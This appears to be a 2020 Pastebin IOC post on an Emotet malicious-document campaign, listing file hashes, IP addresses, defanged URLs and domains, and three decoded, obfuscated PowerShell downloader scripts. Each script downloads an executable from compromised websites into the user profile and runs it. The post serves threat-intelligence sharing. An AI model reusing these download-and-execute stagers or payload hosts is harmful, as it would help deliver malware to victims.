paladin316

Emotet_Doc_out_2020-09-18_23_20.txt

Sep 18th, 2020
4,473
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.96 KB | None | 0 0
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4. 0145a12527d52916e2a2ef2811d0b86f90834caffdbf0b03bc8425f94d686455
  5. 799092a92ab09378ef6e83c5ec89bac5462cd33fdc618ce517fcddf97bf26cff
  6. 9da4f588f2e4d4059a1d2a105f4fca8367ffa3f1ad0f39abdac4aa4501b7aa1b
  7. 9da4f588f2e4d4059a1d2a105f4fca8367ffa3f1ad0f39abdac4aa4501b7aa1b
  8. a83c9759321f48ee74ffd64e1ea879f1a4e77a5c212c3a604173d38e65291c51
  9. a83c9759321f48ee74ffd64e1ea879f1a4e77a5c212c3a604173d38e65291c51
  10. 36b6e14a2a3fca0d91d0303e32a2c74000c4929fe01c3d8fa04a13a7ff65086f
  11. 36b6e14a2a3fca0d91d0303e32a2c74000c4929fe01c3d8fa04a13a7ff65086f
  12. 2e8149f5710be530164ed7faffc9f5c33602938ade1bba597c1bd5d31f8837b3
  13. 0258529b89cb288a228b0791ffc721de998c886e2622408ef37389d0796cb038
  14. d0fbfd4dc83b404a1168591a1d4a52b1cb9da8f58c55e95719dc0199efe6fdb5
  15. 3becf7d3aed1e6a3483bdeb9eb4c6887e9eb13ed6f194315109eeb2f19ae9a07
  16. c4f84b019ea7621f6f614e11c9bc04c8c47ef1b99e136e16715ec26d26e9f24d
  17. a5ce864f2c3bca89c24abc1fa1068e590b7df70133a6f8d4ddbfb26f3f72a85b
  18. 29c2db70c2ce8da26776dac8aa23097df5663524a46ac77518a87d9d964c4e8f
  19. 0afb7c179025ddfba82f253e521171894baccb916aadce3f0c6cd8014f706940
  20. a4a33971129c80d8e4a6f163b6df265fc6ef694b64a1b973114dafa6af5da736
  21. e373b51731dd9794dfbb3967839423a04999996ee921f1d3642d9fb53b0f107b
  22. e2860c0869c119f7e37d4013db5d459bbfcfad7fb9c90767134135a988939a86
  23. ad3ae846e4d7d6c6486ff7745250a6369003b467de82c65d5024b389f718c0c4
  24. 6f8efbd1a395cd60ea9b8707e83cc385dcd02826653fe78b0eb448d22d350035
  25. 6f8efbd1a395cd60ea9b8707e83cc385dcd02826653fe78b0eb448d22d350035
  26. 65603b499c24d66104493036513a1bdaa69eaed1280c65bbafdbc9f26c35a502
  27. 65603b499c24d66104493036513a1bdaa69eaed1280c65bbafdbc9f26c35a502
  28. 8e5ac6f2951e0bfdd5e7c036075f4f8706bdf1a1639c43372f38fc91047d0a4c
  29. d23fa82b132d789d0acf534793a6437c0fbd0b86e7e85475b6856e558b964ca7
  30. 50d66616676d8ca532ea8333e2d545587d54e83abd08f0720012392cba583f26
  31. 37a0d9d6ec68559ded11b432a58dba6536644a809e72c3375dc0b656f78a4964
  32.  
  33.  
  34. IPs:
  35. 103.143.208.149
  36. 103.8.25.12
  37. 104.18.46.187
  38. 104.18.47.187
  39. 104.18.54.104
  40. 104.18.55.104
  41. 128.199.16.135
  42. 172.67.176.115
  43. 172.67.200.149
  44. 185.86.165.178
  45. 198.57.223.32
  46. 216.244.91.100
  47. 35.206.120.183
  48. 35.214.159.46
  49. 37.122.210.206
  50. 39.105.54.216
  51. 47.94.221.221
  52. 62.210.151.64
  53. 64.37.60.39
  54. 66.76.73.231
  55. 66.96.134.66
  56. 67.208.116.218
  57. 68.66.226.82
  58. 69.16.200.139
  59. 83.150.213.216
  60.  
  61.  
  62.  
  63. URLs:
  64. hxxp://zplusshopping.com/wp-content/plugins/8ek/
  65. hxxps://www.cupgel.com/__MACOSX/3/
  66. hxxp://freespiritmind.com/MASD/HowTo/css/J/
  67. hxxp://crewnecksusa.com/wp-content/NJ/
  68. hxxp://www.dougsuniverse.com/pics/yL8/
  69. hxxps://idilsoft.com/admin/B/
  70. hxxps://guhaasmart.com/wp-content/s/."Spl`iT"[char]42;
  71. hxxp://jpwoodfordco.com/admin/sDs/
  72. hxxp://luzzeri.com/wp-includes/o9G/
  73. hxxp://matadebenfica.com/permanente/u/
  74. hxxps://hapyc.com/wp-content/s/
  75. hxxps://zycccccc.top/wp-content/lx3/
  76. hxxps://dezurve.sa/webmail/installer/mqi/
  77. hxxp://swiftlogisticseg.com/wp-admin/7/."sP`LIT"[char]42;
  78. hxxp://sasystemsuk.com/index_files/j9b/
  79. hxxps://case.gonukkad.com/sys-cache/fmC/
  80. hxxp://vandamebuilders.com/wp-includes/OEyjc9x/
  81. hxxps://nilinkeji.com/online/Dmz/
  82. hxxp://paganwitch.com/wp-admin/CmubpSk/
  83. hxxp://www.ekramco.ir/english/fn/
  84. hxxp://votesteve.us/closed_zone/Bk/."SpL`it"[char]42;
  85.  
  86.  
  87. Domains:
  88. zplusshopping.com
  89. www.cupgel.com
  90. freespiritmind.com
  91. crewnecksusa.com
  92. www.dougsuniverse.com
  93. idilsoft.com
  94. guhaasmart.com
  95. jpwoodfordco.com
  96. luzzeri.com
  97. matadebenfica.com
  98. hapyc.com
  99. zycccccc.top
  100. dezurve.sa
  101. swiftlogisticseg.com
  102. sasystemsuk.com
  103. case.gonukkad.com
  104. vandamebuilders.com
  105. nilinkeji.com
  106. paganwitch.com
  107. www.ekramco.ir
  108. votesteve.us
  109.  
  110.  
  111. Decoded Base64 Powershell:
  112. ����^�$Gygpoh5=Oasis3p;
  113. .new-item $enV:UseRpRoFILe\Wc5Suwd\iJzerlD\ -itemtype dIRECtOrY;
  114. [Net.ServicePointManager]::"SeCuRI`T`y`p`Roto`col" = tls12, tls11, tls;
  115. $Al1o4s0 = F1rxg4v7;
  116. $Y1chhpz=Bffltvy;
  117. $Mxqbl7l=$env:userprofiledVXWc5suwddVXIjzerlddVX -rEPlACE [ChAR]100[ChAR]86[ChAR]88,[ChAR]92$Al1o4s0.exe;
  118. $X9td6_u=A835qrq;
  119. $Qu3yc5j=&new-object NeT.WEBClIENt;
  120. $V78suhf=hxxp://zplusshopping.com/wp-content/plugins/8ek/
  121. hxxps://www.cupgel.com/__MACOSX/3/
  122. hxxp://freespiritmind.com/MASD/HowTo/css/J/
  123. hxxp://crewnecksusa.com/wp-content/NJ/
  124. hxxp://www.dougsuniverse.com/pics/yL8/
  125. hxxps://idilsoft.com/admin/B/
  126. hxxps://guhaasmart.com/wp-content/s/."Spl`iT"[char]42;
  127. $H7qr22n=Uaqwjny;
  128. foreach$Efyn1_k in $V78suhf{try{$Qu3yc5j."d`OWn`LoAdfile"$Efyn1_k, $Mxqbl7l;
  129. $Vok7b4z=Eihkx73;
  130. If &Get-Item $Mxqbl7l."l`e`NgTh" -ge 31716 {.Invoke-Item$Mxqbl7l;
  131. $Baxfgsf=Yk5u9vx;
  132. break;
  133. $Rabhucs=Mltuc09}}catch{}}$W9hmb_x=Dlds6oh����^�$Irylyim=Egmuaht;
  134. &new-item $EnV:USERprofilE\YrzRXcy\IOqGeAs\ -itemtype DireCTorY;
  135. [Net.ServicePointManager]::"sEcuRIt`Ypr`Otoc`Ol" = tls12, tls11, tls;
  136. $Adbxvb3 = Hpauds1;
  137. $I5qbmdg=P2leork;
  138. $O_g3p4j=$env:userprofile{0}Yrzrxcy{0}Ioqgeas{0} -f [CHar]92$Adbxvb3.exe;
  139. $Dskr2en=Wg7z_0h;
  140. $Cl4hl6a=&new-object net.WEBClieNt;
  141. $Yqrnyb6=hxxp://jpwoodfordco.com/admin/sDs/
  142. hxxp://luzzeri.com/wp-includes/o9G/
  143. hxxp://matadebenfica.com/permanente/u/
  144. hxxps://hapyc.com/wp-content/s/
  145. hxxps://zycccccc.top/wp-content/lx3/
  146. hxxps://dezurve.sa/webmail/installer/mqi/
  147. hxxp://swiftlogisticseg.com/wp-admin/7/."sP`LIT"[char]42;
  148. $Tg_64l5=Zl0j7p7;
  149. foreach$Hcn0a30 in $Yqrnyb6{try{$Cl4hl6a."DO`WnL`oaDfIlE"$Hcn0a30, $O_g3p4j;
  150. $Elovij2=Mlggisb;
  151. If &Get-Item $O_g3p4j."lE`N`GTH" -ge 32550 {&Invoke-Item$O_g3p4j;
  152. $Mnhsp96=Erqfdjp;
  153. break;
  154. $Btzuwws=Torey7r}}catch{}}$I1pcym2=O8b3lcn����^�$Qgnuzkq=Y2rujea;
  155. .new-item $enV:UsERPROFILe\JHAiNGG\e7pZ5_W\ -itemtype dIrECToRy;
  156. [Net.ServicePointManager]::"se`C`U`RIt`ypRoTocoL" = tls12, tls11, tls;
  157. $E5n91sj = T14gn0;
  158. $Yy9jx2y=Eiukte1;
  159. $C6pqsgn=$env:userprofile{0}Jhaingg{0}E7pz5_w{0} -f [ChaR]92$E5n91sj.exe;
  160. $C35kw1x=B6n9dgq;
  161. $F6nroe1=&new-object nET.WEBCLienT;
  162. $Jlmxnxc=hxxp://sasystemsuk.com/index_files/j9b/
  163. hxxps://case.gonukkad.com/sys-cache/fmC/
  164. hxxp://vandamebuilders.com/wp-includes/OEyjc9x/
  165. hxxps://nilinkeji.com/online/Dmz/
  166. hxxp://paganwitch.com/wp-admin/CmubpSk/
  167. hxxp://www.ekramco.ir/english/fn/
  168. hxxp://votesteve.us/closed_zone/Bk/."SpL`it"[char]42;
  169. $Snp82a4=H_kl15r;
  170. foreach$Nbrgooh in $Jlmxnxc{try{$F6nroe1."dOWnLOADF`i`lE"$Nbrgooh, $C6pqsgn;
  171. $By1ouzh=A2i4n1y;
  172. If &Get-Item $C6pqsgn."LEn`GTH" -ge 20193 {&Invoke-Item$C6pqsgn;
  173. $Dwg14lc=J_wqlsh;
  174. break;
  175. $L7qrb7a=F7a4acv}}catch{}}$Htwilhj=Qqg1v31
Advertisement
Add Comment
Please, Sign In to add comment